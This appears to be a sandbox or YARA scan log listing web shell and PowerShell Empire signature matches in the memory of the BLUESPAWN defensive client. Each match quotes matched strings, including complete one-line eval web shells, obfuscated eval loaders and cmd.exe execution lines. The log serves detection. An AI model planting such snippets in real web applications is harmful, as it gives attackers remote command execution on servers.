- 0x167ad0:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x2a86a8:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_h4ntu_shell_powered_by_tsoi_ | Web Shell - file h4ntu shell [powered by tsoi | unknown | - 0x2d4a33:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x33a320:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x2d4a8e:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x33a371:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x2d4ae9:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x33a3c2:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x2d4b44:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
- 0x33a413:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_sql | Web Shell - file sql.php | Florian Roth | - 0x2d4cc8:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x33a513:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x2d4d20:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x2fbf07:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x33a561:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x35570f:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_a | Web Shell - file a.php | Florian Roth | - 0x2d4e9a:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x325de4:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x33a657:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x37386a:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x2d4eeb:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x320374:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x325e5e:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x33a69e:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x36f772:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x3738da:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x2d4f3d:$s4: <input name="submit_btn" type="submit" value="Execute Command"></p>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_iMHaPFtp_2 | Web Shell - file iMHaPFtp.php | Florian Roth | - 0x2d50c2:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x33a7e7:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x2d511e:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
- 0x33a839:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Jspspyweb | Web Shell - file Jspspyweb.jsp | Florian Roth | - 0x2d52af:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x33a946:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x2d530a:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
- 0x33a997:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x2d54cc:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x33aad5:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x2d5526:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
- 0x33ab25:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend | Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x2d56f9:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x33ac74:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x2d5755:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f4711:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x33acc6:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x34fc4f:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell_2_1_pwhash | Web Shell - file pwhash.php | Florian Roth | - 0x2d58e9:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x33add6:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x2d593d:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
- 0x33ae20:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHPRemoteView | Web Shell - file PHPRemoteView.php | Florian Roth | - 0x2d5acc:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f678f:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33af2b:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x3514b7:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2d5b25:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6201:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33af7a:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33b41e:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_12302 | Web Shell - file 12302.jsp | Florian Roth | - 0x2d5ca9:$s0: </font><%out.print(request.getRealPath(request.getServletPath())); %>
- 0x2d5cfb:$s1: <%@page import="java.io.*,java.util.*,java.net.*"%>
- 0x2d5d3b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_guo | Web Shell - file guo.php | Florian Roth | - 0x2d5ec6:$s0: <?php ($www= $_POST['ice'])!
- 0x33b1ff:$s0: <?php ($www= $_POST['ice'])!
- 0x2d5eef:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
- 0x33b21e:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_redcod | Web Shell - file redcod.php | Florian Roth | - 0x2d605f:$s0: H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw
- 0x2d6094:$s1: HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_remview_fix | Web Shell - file remview_fix.php | Florian Roth | - 0x2d5b25:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6201:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33af7a:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33b41e:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6255:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
- 0x33b468:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6416:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f7185:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2d6463:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_sh_server | Web Shell - file server.php | Florian Roth | - 0x2d65eb:$s0: eval(getenv('HTTP_CODE'));
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PH_Vayv_PH_Vayv | Web Shell - file PH Vayv.php | Florian Roth | - 0x2d674a:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x33b7bd:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x2d6796:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
- 0x33b7ff:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_ice | Web Shell - file ice.asp | Florian Roth | - 0x2d6920:$s0: <%eval request("ice")%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cihshell_fix | Web Shell - file cihshell_fix.php | Florian Roth | - 0x2d6a7e:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x33b9df:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x2d6adb:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
- 0x33ba32:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_shell | Web Shell - file shell.asp | Florian Roth | - 0x2d6c68:$s7: <input type="submit" name="Send" value="GO!">
- 0x2d6ca2:$s8: <TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Private_i3lue | Web Shell - file Private-i3lue.php | Florian Roth | - 0x2d6e20:$s8: case 15: $image .= "\21\0\
- 0x33bc65:$s8: case 15: $image .= "\21\0\
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_up | Web Shell - file up.php | Florian Roth | - 0x2d6f71:$s0: copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
- 0x2d6fc3:$s3: if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
- 0x2d7010:$s8: echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Mysql_interface_v1_0 | Web Shell - file Mysql interface v1.0.php | Florian Roth | - 0x2d71a5:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
- 0x33bece:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_s_u | Web Shell - file s-u.php | Florian Roth | - 0x2d7329:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
- 0x33bfce:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell_2_1_config | Web Shell - file config.php | Florian Roth | - 0x2d74bd:$s1: ; (choose good passwords!). Add uses as simple 'username = "password"' lines.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_EFSO_2 | Web Shell - file EFSO_2.asp | Florian Roth | - 0x2d764a:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
- 0x33c1e7:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_up | Web Shell - file up.jsp | Florian Roth | - 0x2d77d1:$s9: // BUG: Corta el fichero si es mayor de 640Ks
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NetworkFileManagerPHP | Web Shell - file NetworkFileManagerPHP.php | Florian Roth | - 0x2d7957:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
- 0x33c3ec:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Server_Variables | Web Shell - file Server Variables.asp | Florian Roth | - 0x2d7af3:$s7: <% For Each Vars In Request.ServerVariables %>
- 0x2d7b2e:$s9: Variable Name</B></font></p>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_ice_2 | Web Shell - file ice.php | Florian Roth | - 0x2d7c8e:$s0: <?php ${${eval($_POST[ice])}};?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_mdb | Web Shell - file mdb.asp | Florian Roth | - 0x2d7df0:$s1: <% execute request("ice")%>a
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_guige | Web Shell - file guige.jsp | Florian Roth | - 0x2d7f4a:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
- 0x33c7c5:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy2010 | Web Shell - file phpspy2010.php | Florian Roth | - 0x2d80c4:$s3: eval(gzinflate(base64_decode(
- 0x2e121b:$s3: eval(gzinflate(base64_decode(
- 0x2e263d:$s3: eval(gzinflate(base64_decode(
- 0x2f3b7b:$s3: eval(gzinflate(base64_decode(
- 0x2f54c3:$s3: eval(gzinflate(base64_decode(
- 0x305406:$s3: eval(gzinflate(base64_decode(
- 0x307e75:$s3: eval(gzinflate(base64_decode(
- 0x309c70:$s3: eval(gzinflate(base64_decode(
- 0x33c8bb:$s3: eval(gzinflate(base64_decode(
- 0x342b7a:$s3: eval(gzinflate(base64_decode(
- 0x343912:$s3: eval(gzinflate(base64_decode(
- 0x34f3cd:$s3: eval(gzinflate(base64_decode(
- 0x3506b7:$s3: eval(gzinflate(base64_decode(
- 0x35c2ad:$s3: eval(gzinflate(base64_decode(
- 0x35e30e:$s3: eval(gzinflate(base64_decode(
- 0x35f97f:$s3: eval(gzinflate(base64_decode(
- 0x2d80ee:$s5: //angel
- 0x2d8102:$s8: $admin['cookiedomain'] = '';
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ice | Web Shell - file ice.asp | Florian Roth | - 0x2d8257:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
- 0x33c9b6:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_drag_system | Web Shell - file system.jsp | Florian Roth | - 0x2d83c5:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
- 0x33caa0:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_DarkBlade1_3_asp_indexx | Web Shell - file indexx.asp | Florian Roth | - 0x2d8560:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
- 0x33cbb7:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell3 | Web Shell - file phpshell3.php | Florian Roth | - 0x2d86f0:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x33ccc3:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x2d8746:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x33cd0f:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x2d879c:$s7: $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_hsxa | Web Shell - file hsxa.jsp | Florian Roth | - 0x2d8914:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x2e09d0:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x33ce4f:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x3425fe:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_utils | Web Shell - file utils.jsp | Florian Roth | - 0x2d8a9c:$s0: ResultSet r = c.getMetaData().getTables(null, null, "%", t);
- 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_01 | Web Shell - file 01.asp | Florian Roth | - 0x2d8c67:$s0: <%eval request("pass")%>
- 0x2db447:$s0: <%eval request("pass")%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_404 | Web Shell - file 404.asp | Florian Roth | - 0x2d8db8:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
- 0x33d15d:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_cnseay02_1 | Web Shell - file webshell-cnseay02-1.php | Florian Roth | - 0x2d8f2f:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
- 0x33d250:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_fbi | Web Shell - file fbi.php | Florian Roth | - 0x2d90b8:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
- 0x33d355:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_B374kPHP_B374k | Web Shell - file B374k.php | Florian Roth | - 0x2d924a:$s0: Http://code.google.com/p/b374k-shell
- 0x2d927b:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x33d48a:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x2d92d7:$s3: Jayalah Indonesiaku & Lyke @ 2013
- 0x2d9305:$s4: B374k Vip In Beautify Just For Self
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cmd_asp_5_1 | Web Shell - file cmd-asp-5.1.asp | Florian Roth | - 0x2d946d:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x2fa4a1:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_dodo_zip | Web Shell - file zip.php | Florian Roth | - 0x2d95e7:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x33d6da:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x2d9641:$s3: $datastr = "\x50\x4b\x03\x04\x0a
- 0x33d72a:$s3: $datastr = "\x50\x4b\x03\x04\x0a
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_aZRaiLPhp_v1_0 | Web Shell - file aZRaiLPhp v1.0.php | Florian Roth | - 0x2d97cc:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x33d831:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x2d981f:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
- 0x33d87a:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_list | Web Shell - file list.php | Florian Roth | - 0x2d99a9:$s1: // list.php = Directory & File Listing
- 0x2d99dc:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x33d9a9:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x2d9a33:$s9: // by: The Dark Raver
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ironshell | Web Shell - file ironshell.php | Florian Roth | - 0x2d9b89:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x33dac8:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x2d9bcf:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
- 0x33db04:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_404 | Web Shell - file 404.php | Florian Roth | - 0x2d9d50:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
- 0x33dc01:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_aspydrv | Web Shell - file aspydrv.asp | Florian Roth | - 0x2d9ee1:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
- 0x33dd0e:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_web | Web Shell - file web.jsp | Florian Roth | - 0x2da06a:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
- 0x33de13:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_mysqlwebsh | Web Shell - file mysqlwebsh.php | Florian Roth | - 0x2da1f9:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
- 0x33df1e:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jspShell | Web Shell - file jspShell.jsp | Florian Roth | - 0x2da382:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x33e023:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x2da3cd:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
- 0x33e064:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Dx_Dx | Web Shell - file Dx.php | Florian Roth | - 0x2da53c:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x33e14f:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2da593:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x2f928c:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x33e19c:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x353564:$s9: class=linelisting><nobr>POST (php eval)</td><
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ntdaddy | Web Shell - file ntdaddy.asp | Florian Roth | - 0x2da701:$s9: if FP = "RefreshFolder" or
- 0x33e286:$s9: if FP = "RefreshFolder" or
- 0x2da72e:$s10: request.form("cmdOption")="DeleteFolder"
- 0x33e2aa:$s10: request.form("cmdOption")="DeleteFolder"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_MySQL_Web_Interface_Version_0_8 | Web Shell - file MySQL Web Interface Version 0.8.php | Florian Roth | - 0x2da8c5:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
- 0x33e3bd:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_elmaliseker_2 | Web Shell - file elmaliseker.asp | Florian Roth | - 0x2daa5a:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x33e4ce:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x2daab2:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
- 0x33e51c:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_RemExp | Web Shell - file RemExp.asp | Florian Roth | - 0x2dac3f:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
